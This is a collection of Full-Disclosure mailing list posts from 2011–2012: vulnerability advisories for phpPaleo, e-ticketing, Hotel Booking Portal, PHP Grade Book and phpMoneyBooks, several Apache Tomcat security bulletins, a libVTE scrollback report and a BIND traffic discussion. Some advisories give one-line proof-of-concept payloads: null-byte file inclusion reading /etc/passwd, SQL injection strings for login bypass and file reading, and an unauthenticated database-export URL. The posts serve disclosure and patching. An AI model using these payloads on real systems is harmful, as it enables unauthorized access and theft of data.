Hello. After posting the flaw with libvte's handling of the scrollback buffer (writing it to disk), there were several people who made the erroneous claim that most distributions of Linux use tmpfs now and encrypt swap and that this shouldn't be an issue. Because these claims attempted to diminish the importance of the flaw for many, I installed most of the popular distributions of Linux as well as some of the BSDs for comparison to see what their default setup was after installation. I have found that of the 35+ distribution versions that I tested, only the latest Arch Linux puts /tmp on tmpfs by default and the only other distributions that show it as an option during installation are Mageia or PC Linux OS. So the libvte flaw indeed is a widespread problem. I've documented the results at: http://www.climagic.org/bugreports/libvte-flaw-distro-defaults-chart.html You can view the libvte bug report here: http://climagic.org/bugreports/libvte-scrollback-written-to-disk.html Extra Note: I'm not suggesting that everyone put their /tmp on tmpfs and/or start using encrypted filesystem. There are other considerations which I talk about in the document above. -- Mark S. Krenz IT Director Suso Technology Services, Inc. Sent from Mutt using Linux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'phpPaleo' Local File Inclusion (CVE-2012-1671)
'phpPaleo' Local File Inclusion (CVE-2012-1671) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in index.php for language handling that allows for local file inclusion using a null-byte attack on the 'lang' GET parameter. II. TESTED VERSION --- 4.8b156 III. PoC EXPLOIT --- http://localhost/phppaleo/index.php?lang=../../../../../../../etc/passwd%00 IV. NOTES --- * magic_quotes_gpc must be disabled and PHP must be 5.3.4 for null-byte attacks to work V. SOLUTION --- Upgrade to 4.8b157 or above. VI. REFERENCES --- http://sourceforge.net/projects/phppaleo/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1671 VII. TIMELINE --- 03/01/2012 - Initial vendor disclosure 03/02/2012 - Vendor patched and released an updated version 04/04/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'e-ticketing' SQL Injection (CVE-2012-1673)
'e-ticketing' SQL Injection (CVE-2012-1673) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in loginscript.php that allows for SQL injection of the 'user_name' and 'password' POST parameters. II. TESTED VERSION --- Released on 2011-11-30 (no versioning used) III. PoC EXPLOIT --- POST a form to loginscript.php with the value of 'password' set to: ' UNION SELECT * from user where user_name = 'admin IV. SOLUTION --- Do not use this software, no patched version exists at this time. V. REFERENCES --- http://sourceforge.net/projects/e-ticketing/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1673 VI. TIMELINE --- 03/01/2012 - Initial vendor disclosure 03/03/2012 - Vendor response and commitment to fix 03/20/2012 - Follow-up e-mail to vendor as no patched version was published yet 04/04/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Hotel Booking Portal' SQL Injection (CVE-2012-1672)
'Hotel Booking Portal' SQL Injection (CVE-2012-1672) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in getcity.php that allows for SQL injection of the 'country' POST parameter. II. TESTED VERSION --- 0.1 III. PoC EXPLOIT --- POST a form to getcity.php with the value of 'country' set to: ' union select null,null,load_file(0x2f6574632f706173737764),null,null,null,null,null from users where 'a'='a IV. SOLUTION --- Do not use this software, no patched version exists at this time. V. REFERENCES --- http://sourceforge.net/projects/hbportal/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1672 VI. TIMELINE --- 03/02/2012 - Initial vendor disclosure 03/20/2012 - Received no response and sent a second e-mail to the vendor 04/04/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670)
'PHP Grade Book' Unauthenticated SQL Database Export (CVE-2012-1670) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in admin/index.php that allows for an unauthenticated user to export the entire application database by accessing the 'Database Backup' method without restriction. Due to the way sessions are handled, an attacker can then simply pass the username and password-hash via cookies to assume the administrative role without ever knowing the clear-text version of the password. II. TESTED VERSION --- 1.9.4 III. PoC EXPLOIT --- http://localhost/phpGradeBook/admin/index.php?action=SaveSQL IV. SOLUTION --- Upgrade to 1.9.5 or above. V. REFERENCES --- http://sourceforge.net/projects/php-gradebook/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1670 VI. TIMELINE --- 02/29/2012 - Initial vendor disclosure 02/29/2012 - Vendor response and commitment to fix 03/01/2012 - Vendor patched and released an updated version 03/22/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
'phpMoneyBooks' Local File Inclusion (CVE-2012-1669) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in index.php for module handling that allows for local file inclusion using a null-byte attack on the 'module' GET parameter. II. TESTED VERSION --- 1.0.2 III. PoC EXPLOIT --- http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00 IV. NOTES --- * magic_quotes_gpc must be disabled and PHP must be 5.3.4 for null-byte attacks to work V. SOLUTION --- Upgrade to 1.0.3 or above. VI. REFERENCES --- http://phpmoneybooks.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669 VII. TIMELINE --- 02/29/2012 - Initial vendor disclosure 03/01/2012 - Vendor patched and released an updated version 03/22/2012 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] gnome-terminal, xfce4-terminal, terminator and others write scrollback buffer to disk
On Wed, Mar 07, 2012 at 01:12:04AM GMT, coderman [coder...@gmail.com] said the following: On Tue, Mar 6, 2012 at 1:46 PM, Mark Krenz m...@suso.com wrote: Title: Gnome terminal, xfce4-terminal, terminator and other libVTE based terminals write scrollback buffer data to /tmp filesystem temp data in /tmp ? i'm shocked, SHOCKED! *cough* I think you misread that as temp. It says term. Might want to get your eyes checked. ;-) -- Mark S. Krenz IT Director Suso Technology Services, Inc. Sent from Mutt using Linux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] gnome-terminal, xfce4-terminal, terminator and others write scrollback buffer to disk
Title: Gnome terminal, xfce4-terminal, terminator and other libVTE based terminals write scrollback buffer data to /tmp filesystem Report date: 2011-03-06 Reported by: Mark Krenz Severity: High depending on use and expectations Software: libVTE v0.21.6 and later (since September 17th, 2009) Copy of report available at: http://www.climagic.com/bugreports/libvte-scrollback-written-to-disk.html Affected software: --- gnome-terminal terminator xfce4-terminal guake evilvte lilyterm sakura termit Anything else that uses libVTE for a terminal widget. Summary: --- Due to the way the history buffer is saved in terminal emulators using libVTE after version 0.21.6, data from inside your terminal window can end up on your local filesystem. This is most likely unexpected behavior in a terminal emulator and represents a very significant security issue. Worse case scenario: --- Classified, secret or medical information that was accessed through a terminal window was thought to be safe because it was on a remote server and only accessed via SSH, but now its also on the hard drive that is for sale online or stolen without having been wiped because this issue was not accounted for. References: --- http://ftp.gnome.org/pub/GNOME/sources/vte/0.21/vte-0.21.6.changes https://bugzilla.gnome.org/show_bug.cgi?id=664611 https://bugzilla.gnome.org/show_bug.cgi?id=631685 https://bugzilla.xfce.org/show_bug.cgi?id=8183 https://plus.google.com/u/0/104947878052533251426/posts/Q9JmPiEckD9 http://www.climagic.com/bugreports/libvte-scrollback-written-to-disk.html Video demonstration: --- I felt that this problems caused by this flaw can't be stressed enough and made a video demonstrating this problem. It can be viewed at: http://www.youtube.com/watch?v=LgNLHskYvVE Description: --- The libVTE library implements the virtual terminal widget that is used by many widely used terminal emulators. This library handles how text is displayed within the terminal and also handles how the scrollback buffer is saved. On September 17th, 2009 a change was committed to libVTE by Behdad Esfahbod that altered the way the scrollback buffer was implemented in libVTE. The new way creates a file in the /tmp filesystem and immediately unlinks it. This is not an uncommon way of handling tmp files, however there are probably many people who would not expect data from within the terminal window to be written to disk. There is a sense of trust that the data in the terminal is only stored in memory and is cleared when the computer is shut off. In a sense, this bug is allowing the data to break the forth wall. I discovered this issue in November of 2011 while talking about uses for the lsof command on the @climagic Twitter account. I immediately found which software was the culprit and submitted a bug reports to Gnome's Bugzilla. The response so far has been that the developer doesn't not consider this a bug. I also wrote to Behdad Esfahbod about the issue but have not heard back from him. I was giving these people a bit of time to respond or resolve the issue, but apparently that isn't going to happen without making a bigger deal of it. Other knowledgeable security people have considered this a major security issue. Daniel Gillmor brought this security issue up with the libvte developer Behdad Esfahbod, in June of 2011 in bug #631685, but didn't seem to convince Behdad that the code needed to be changed. Behdad indicated at the time that he wasn't planning on working on libVTE in the future. There have been a few posts in recent months in this bug report about seeing if something can be done in the kernel, but the two developers discussing it seem to be convinced that its OK to write this data to disk. Some may not consider this a bug and make the excuse that your terminal's memory stack may end up in swap anyways, or that only root would have access to the data or that you should encrypt /tmp. However due to the wide variety of ways in which people implement security on their systems, knowledge of this issue is essential to everyone who uses one of these affected terminal emulators. With as much memory as we have on modern hardware, some people simply turn off swap, which avoids the stack in swap issue. But those people may not know about this scrollback buffer issue. Testing and reproducing the issue: --- On Linux, if you
[Full-disclosure] [SECURITY] CVE-2011-3375 Apache Tomcat Information disclosure
CVE-2011-3375 Apache Tomcat Information disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.21 - Tomcat 6.0.30 to 6.0.33 - Earlier versions are not affected Description: For performance reasons, information parsed from a request is often cached in two places: the internal request object and the internal processor object. These objects are not recycled at exactly the same time. When certain errors occur that needed to be added to the access log, the access logging process triggers the re-population of the request object after it has been recycled. However, the request object was not recycled before being used for the next request. That lead to information leakage (e.g. remote IP address, HTTP headers) from the previous request to the next request. The issue was resolved be ensuring that the request and response objects were recycled after being re-populated to generate the necessary access log entries. Mitigation: Users of affected versions should apply one of the following mitigations: - Tomcat 7.0.x users should upgrade to 7.0.22 or later - Tomcat 6.0.x users should upgrade to 6.0.35 or later Credit: The issue was initially reported via Apache Tomcat's public issue tracker with the potential security implications identified by the Apache Tomcat security team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html https://issues.apache.org/bugzilla/show_bug.cgi?id=51872 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2012-0022 Apache Tomcat Denial of Service
CVE-2012-0022 Apache Tomcat Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.22 - Tomcat 6.0.0 to 6.0.33 - Tomcat 5.5.0 to 5.5.34 - Earlier, unsupported versions may also be affected Description: Analysis of the recent hash collision vulnerability identified unrelated inefficiencies with Apache Tomcat's handling of large numbers of parameters and parameter values. These inefficiencies could allow an attacker, via a specially crafted request, to cause large amounts of CPU to be used which in turn could create a denial of service. The issue was addressed by modifying the Tomcat parameter handling code to efficiently process large numbers of parameters and parameter values. Mitigation: Users of affected versions should apply one of the following mitigations: - Tomcat 7.0.x users should upgrade to 7.0.23 or later - Tomcat 6.0.x users should upgrade to 6.0.35 or later - Tomcat 5.5.x users should upgrade to 5.5.35 or later Credit: The inefficiencies in handling large numbers of parameters were identified by the Apache Tomcat security team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-3376 Apache Tomcat - Privilege Escalation via Manager app
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2011-3376 Apache Tomcat - Privilege Escalation via Manager app Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.21 Description: This issue only affects environments running web applications that are not trusted (e.g. shared hosting environments). The Servlets that implement the functionality of the Manager application that ships with Apache Tomcat should only be available to Contexts (web applications) that are marked as privileged. However, this check was not being made. This allowed an untrusted web application to use the functionality of the Manager application. This could be used to obtain information on running web applications as well as deploying additional web applications. Mitigation: Users of Tomcat 7.0.x should upgrade to 7.0.22 or later Credit: This issue was identified by Ate Douma References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJOuWxPAAoJEBDAHFovYFnng3oP/jkYsplqxz9hjWi6uztQK3Gv BlS1IlbyqW5HW8rqr/pyfLWDDiJZUc+FmWRbyT96r/V4z0w4oGglGi289owLr1Lx bsGlauWQhZh7k5nWKboMVEk6CjGOXVQ9zMJJwhEkrXn6/HNV5O65F/0nnLoHgStM DNyKKpYDtc6XCI7+Pcutv3fqkk9niF3KSF3rePKlpUstVbuLx9HlX+0fbj7+X4w/ PyE5R9tVfr3Toiwn546QQR73VkOSmAGt0IEE9P06oY50ruW3/Z6wJjVHrlJUsoQ3 txupoC+FCZ5ph8DfoeVzav6Y3W9dImXz6rzxm3YnUKCDZuWnGVNzDE4IUyKdRM5t W/Smquaat8VxsxMbU34bSJHYA1m2nos4qPrQvJl2w0wKWrPFRnu4f8RImvg1BIPH gZ17raqPjdoBuE3H4ivgF0DSasVdYM/Ge977B+6nD9jzwE6FEFAFCCRpbYvD/6SA //QbqSlcULb6CKZ6D/rNbLSQ3e0QD6GYaz3HjJcCtJkqo2FoLGY88AxtoF4es5SB thYJf7r51J9W8g7nvw+b7Y0+eG3IczsBA0spIoyzIKr1RxSEFE2220idPdotpjAf aticEwF9U5przWmwNab7lKUd91bo32ZVtvIprPGL/NfHrL3KC891gjYqkQtrcJC5 SkiQ74ix/uGZTB6HHCWm =wak3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] bind-9.8.1 remote code exec exploit?
In message c2122821abc4d89254092500a8814215.squir...@gameframe.net, nix@mypro
xylists.com writes:
Hello list.
I've source compile of BIND 9.8.1 on the server.
I've been investigating weird iptables messages as follows:
Oct 29 14:53:13 NIX kernel: IN= OUT=eth0 SRC=MY_SERVER_IP DST=62.80.128.29
LEN=114 TOS=0x00 PREC=0x00 TTL=64 ID=31795 PROTO=UDP SPT=53 DPT=5060
LEN=94
I received a message from my ISP abuse that my server is scanning SIP port
5060 and I set the firewall rule to deny/log all UDP connections out of
the box to port 5060 to get timestamps for further investigation. This
happened before I set the firewall rule.
You are just blocking legitimate reply traffic. Your ISP is probably
misclassifying traffic it sees destined to port 5060. Nameservers
randomly pick source ports to make it harder for off path attackers
to spoof reply packets and, unless something is already using port
5060, port 5060 is fair game.
You can stop your own nameservers using 5060 as a query source port
with avoid-v4-udp-ports but it doesn't do much to help with queries
to you.
avoid-v4-udp-ports { 5060; };
avoid-v6-udp-ports { 5060; };
You should also adjust your firewall to let packets sourced from
port 53 on your nameservers to any port go through. That way you
won't get false positives.
Mark
/var/log/named.log
05-Oct-2011 06:05:58.093 client: warning: client 81.25.53.2#5060: error
sending response: host unreachable
07-Oct-2011 13:14:38.739 client: warning: client 221.210.153.6#5060: error
sending response: host unreachable
08-Oct-2011 00:43:22.881 client: warning: client 212.59.18.8#5060: error
sending response: host unreachable
08-Oct-2011 13:42:58.943 client: warning: client 202.43.160.50#5060: error
sending response: host unreachable
12-Oct-2011 10:26:20.586 client: warning: client 213.77.43.115#5060: error
sending response: host unreachable
14-Oct-2011 15:42:12.676 client: warning: client 193.210.19.19#5060: error
sending response: host unreachable
15-Oct-2011 16:26:16.573 client: warning: client 202.44.204.36#5060: error
sending response: host unreachable
16-Oct-2011 20:52:44.570 client: warning: client 200.63.56.5#5060: error
sending response: host unreachable
17-Oct-2011 01:48:49.617 client: warning: client 84.22.23.4#5060: error
sending response: host unreachable
23-Oct-2011 12:34:26.255 client: warning: client 208.69.35.15#5060: error
sending response: host unreachable
25-Oct-2011 01:50:17.382 client: warning: client 84.88.226.10#5060: error
sending response: host unreachable
25-Oct-2011 15:23:51.384 client: warning: client 195.222.32.20#5060: error
sending response: host unreachable
29-Oct-2011 14:53:13.208 client: warning: client 62.80.128.29#5060: error
sending response: host unreachable
Timestamps matches exactly to kernel's firewall log. Every time BIND error
log has the above entry, the box tries to scan for SIP port 5060.
Is it possible to scan ports through BIND or exec code by sending a
specially crafted request?
PS. I have been tracking this issue for a week and no other timestamps
matches exactly to this isssue. I have currently grsec' exec logging on
and hoping this issue occurs soon so I can see will it execute extra code
under the user 'bind'.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: ma...@isc.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication Severity: Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.11 - - Tomcat 6.0.0 to 6.0.32 - - Tomcat 5.5.0 to 5.5.33 - - Earlier, unsupported versions may also be affected Description: The implementation of HTTP DIGEST authentication was discovered to have several weaknesses: - - replay attacks were permitted - - server nonces were not checked - - client nonce counts were not checked - - qop values were not checked - - realm values were not checked - - the server secret was hard-coded to a known string The result of these weaknesses is that DIGEST authentication was only as secure as BASIC authentication. Mitigation: Users of Tomcat 7.0.x should upgrade to 7.0.12 or later Users of Tomcat 6.0.x should upgrade to 6.0.33 or later Users of Tomcat 5.5.x should upgrade to 5.5.34 or later Credit: This issue was identified by the Apache Tomcat security team References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJOgF0tAAoJEBDAHFovYFnnv70QALdoVwivDt9bXBEpMgjJ0/NY kadCFsA/X+O8TEKTRx/85B54Spgv8dGJFiPMettdbfjFuq7ADsRiAbxsZQ3dEIfJ esrWfPJRTpXhjKU1OOLmoDvoueAD0pD7/qvl8o9bFowxGXLWqvO/elFe+4AH2YjZ ux9tWOlWn46Q7ffaNOzRebjPVIQ3ebB+FH9ToZAdNfFFIZbtxYRMV02wRfHWq+fU kTJ+hKF0XOpzyIut3zkmE00ZuvGAPLdnZcMKq9m/X/dt/niP2nT8H28Xx1Zu8sW+ CUE7CRse4pI6fGuXVrOAk1akyN/hkiSPxDNsDnHxALTNmjr1Z+DAs7QT5IKc3EDv NeSXAnxKfIJ83jcjam1bEf38UN1uYatP/u6XJCVpnOr0UjJ9wtO+QgSV/93eiyD7 YCpVcmKay/jvWmLPp7MRB+h6FGhJNw5OA5k7IWJePBXC39p6tpac3vsOKx1OGU38 QKUglIro/TtZo7gmfeG8lD3lI493l25+3E/vBiSrbfSHua3bmyFQikQMhy2ZPYIt 4wEfdaW4hUBJHpxkDaotuTTN8ATzQLtDNTGei2u76ZXQiOjTLUDGam++6fR+kfZU gloAy8ZIS702hoXg/ypFPtcyIx435dOgxtGIbOedmDUsy1ErGTCAksrOyn2yZl3v +Ew0bAULNmXwKQeMyDj0 =u/Ai -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is This MITM Attack to Gmail's SSL ?
On Mon, 29 Aug 2011 17:38:14 -0500, Ferenc Kovacs tyr...@gmail.com wrote: http://www.google.co.uk/support/forum/p/gmail/thread?tid=2da6158b094b225ahl=en any thoughts? Just saw this posted. Not sure of authenticity. http://pastebin.com/ff7Yg663 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure
CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.20 - Tomcat 6.0.0 to 6.0.33 - Tomcat 5.5.0 to 5.5.33 - Earlier, unsupported versions may also be affected Description: Apache Tomcat supports the AJP protocol which is used with reverse proxies to pass requests and associated data about the request from the reverse proxy to Tomcat. The AJP protocol is designed so that when a request includes a request body, an unsolicited AJP message is sent to Tomcat that includes the first part (or possibly all) of the request body. In certain circumstances, Tomcat did not process this message as a request body but as a new request. This permitted an attacker to have full control over the AJP message which allowed an attacker to (amongst other things): - insert the name of an authenticated user - insert any client IP address (potentially bypassing any client IP address filtering) - trigger the mixing of responses between users The following AJP connector implementations are not affected: org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default) The following AJP connector implementations are affected: org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default) org.apache.coyote.ajp.AjpNioProtocol (7.0.x) org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x) Further, this issue only applies if all of the following are are true for at least one resource: - POST requests are accepted - The request body is not processed Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698 Mitigation: Users of affected versions should apply one of the following mitigations: - Upgrade to a version of Apache Tomcat that includes a fix for this issue when available - Apply the appropriate patch - 7.0.x http://svn.apache.org/viewvc?rev=1162958view=rev - 6.0.x http://svn.apache.org/viewvc?rev=1162959view=rev - 5.5.x http://svn.apache.org/viewvc?rev=1162960view=rev - Configure the reverse proxy and Tomcat's AJP connector(s) to use the requiredSecret attribute - Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not available for Tomcat 7.0.x) Credit: The issue was reported via Apache Tomcat's public issue tracker. The Apache Tomcat security team strongly discourages reporting of undisclosed vulnerabilities via public channels. All Apache Tomcat security vulnerabilities should be reported to the private security team mailing list: secur...@tomcat.apache.org References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html https://issues.apache.org/bugzilla/show_bug.cgi?id=51698 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
On Fri, Aug 19, 2011 at 11:23 PM, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: (see attachment) Use CVE-2011-3192. Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
On Sat, 20 Aug 2011, HI-TECH . wrote: (see attachment) Use CVE-2011-3192. Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)
CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat) Severity: Important Vendor: The Apache Software Foundation Versions Affected: Tomcat 7.0.0 to 7.0.19 Tomcat 6.0.30 to 6.0.32 Tomcat 5.5.32 to 5.5.33 Description: Due to a bug in the capabilities code, jsvc (the service wrapper for Linux that is part of the Commons Daemon project) does not drop capabilities allowing the application to access files and directories owned by superuser. This vulnerability only applies if: a) Tomcat is running on a Linux operating system b) jsvc was compiled with libcap c) -user parameter is used The Tomcat versions above shipped with source files for jsvc that included this vulnerability. Mitigation: Affected users of all versions can mitigate these vulnerabilities by taking any of the following actions: a) upgrade to jsvc 1.0.7 or later b) do not use -user parameter to switch user c) recompile the jsvc without libcap support Updated jsvc source is included in Apache Tomcat 7.0.20 and will be included in the next releases of Tomcat 6.0.x and 5.5.x. Updated source can be obtained from the Apache Commons Daemon project. Credit: This issue was identified by Wilfried Weissmann. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2481: Apache Tomcat information disclosure vulnerability
CVE-2011-2481: Apache Tomcat information disclosure vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 7.0.0 to 7.0.16 Previous versions are not affected. Description: The re-factoring of XML validation for Tomcat 7.0.x re-introduced the vulnerability previously reported as CVE-2009-0783. This was initially reported as a memory leak (https://issues.apache.org/bugzilla/show_bug.cgi?id=51395). If a web application is the first web application loaded, this bug allows that web application to potentially view and/or alter the web.xml, context.xml and tld files of other web applications deployed on the Tomcat instance. Mitigation: 7.0.x users should upgrade to 7.0.17 or later Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=29936#c12 for an example web application that can be used to replace the XML parser used by Tomcat. Credit: The security implications of bug 51395 were identified by the Tomcat security team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html The Apache Tomcat Security Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2204 - Apache Tomcat information disclosure
CVE-2011-2204 Apache Tomcat information disclosure Severity: Low Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.16 - Tomcat 6.0.0 to 6.0.32 - Tomcat 5.5.0 to 5.5.33 Earlier, unsupported versions may also be affected Description: When using the MemoryUserDatabase (based on tomcat-users.xml) and creating users via JMX, an exception during the user creation process may trigger an error message in the JMX client that includes the user's password. This error message is also written to the Tomcat logs. User passwords are visible to administrators with JMX access and/or administrators with read access to the tomcat-users.xml file. Users that do not have these permissions but are able to read log files may be able to discover a user's password. Steps to reproduce: The Tomcat security team has been unable to reproduce this error without forcing an exception by modifying the Tomcat source code. In theory, an OutOfMemoryError at exactly the right point could trigger this vulnerability. Mitigation: Users of affected versions should apply one of the following mitigations: - Don't manage the MemoryUserDatabase via JMX - Use digested passwords - Limit access to Tomcat log files - Upgrade to a Tomcat 7.0.17, 6.0.33 or 5.5.34 or later once released - Apply the appropriate patch - 7.0.x: http://svn.apache.org/viewvc?rev=1140070view=rev - 6.0.x: http://svn.apache.org/viewvc?rev=1140071view=rev - 5.5.x: http://svn.apache.org/viewvc?rev=1140072view=rev Credit: This issue was identified by Polina Genova and reported privately to the Tomcat Security Team via secur...@tomcat.apache.org. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Got an iPhone or 3G iPad? Apple is recording your moves
not to mention that ocr-able license plate on your vehicle and the electronic toll collection device in the vehicle make excellent persistent tracking cookies. i'm more worried about private parties tracking these days... say set up high res cameras with a good view of the major highways and scan all of the license plates. On Apr 22, 2011, at 6:43 AM, Brian Anderson wrote: On 4/21/2011 5:56 PM, Michal Zalewski wrote: Cool. I got an Iphone 3GS. Consider me ex-user. GG Apple. Let me guess, co-operation deal with NSA and the U.S goverment paid them some billion dollars for that. Totally. A vast conspiracy is the only possible explanation. If you didn't already know that you are being tracked by carrying a cell phone, then you're not paranoid enough to work in security. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Plone CVE-2011-0720 details
This is in regards to CVE-2011-0720, a Plone vulnerability announced in early February. http://plone.org/products/plone/security/advisories/cve-2011-0720 As noted on http://www.securityfocus.com/bid/46102/exploit An attacker can exploit this issue using a browser. To fill in a few more details: Plone is implemented with Zope -- an object oriented system web application framework. Many Zope objects can be referenced by url of a file system like hierarchy formed by object names. Methods of such objects are thus addressable as /path_to_parent_object/path_to_object/name_of_method . Arguments as listed in these function definitions co-respond to field names as per standard URL encoding (http://en.wikipedia.org/wiki/Percent-encoding. Object paths consist of object names and are not necessarily related by type. To search by object type, use the find feature in the Zope Management Interface. I studied the released hotfix and documented co-responding patches in the subversion repositories that were slated to go into Plone 4.0.4 . (easier than reading the hotfix) http://dl.dropbox.com/u/16487130/plone_4.0.4_security_patches.txt Used the Zope Management Interface find feature in my own test deployment of Plone 4.0.3 to find objects of the affected types. Searching for type Pluggable Auth Service (PAS) as patched by http://dev.plone.org/collective/changeset/232213 was most fruitful. On default Plone installations a PAS can be found in /acl_users/ for each installed site. The exposed getUsers and userSetPassword methods are a fairly dangerous combination that can be exploited by anonymous attackers. Other functions are of more limited value or require stronger permissions. These methods are also listed in the log checker 